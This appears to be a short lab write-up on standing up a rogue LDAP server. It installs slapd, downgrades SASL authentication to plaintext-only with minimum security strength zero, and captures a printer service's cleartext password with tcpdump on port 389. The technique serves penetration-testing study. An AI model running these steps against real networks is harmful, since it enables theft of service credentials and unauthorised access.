Rogue LDAP Server
sudo apt install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
Omit initial configuration?:
No
DNS domain name:
target domain
Organization name:
target domain
Administrator password:
anything, but remember it
Database removed?:
No
Move old database?:
Yes
Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.
Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms. We want to ensure that our LDAP server only supports PLAIN and LOGIN authentication methods. To do this, we need to create a new ldif file, called with the following content:
cat ./olcSaslSecProps.ldif
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
olcSaslSecProps: Specifies the SASL security properties
noanonymous: Disables mechanisms that support anonymous login
minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.
Update configuration
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart

Verify configuration
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

We have our LDAP server running under the 389 port.
Capturing LDAP Credentials
sudo tcpdump -SX -i breachad tcp port 389
-S
--absolute-tcp-sequence-numbers
Print absolute, rather than relative, TCP sequence numbers.
-X When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and ASCII.
This is very handy for analysing new protocols. In the current implementation this flag may have the same effect as -XX if the packet is truncated.



And we are able to retrieve the plain text password used for the Printer Service against LDAP.
Last updated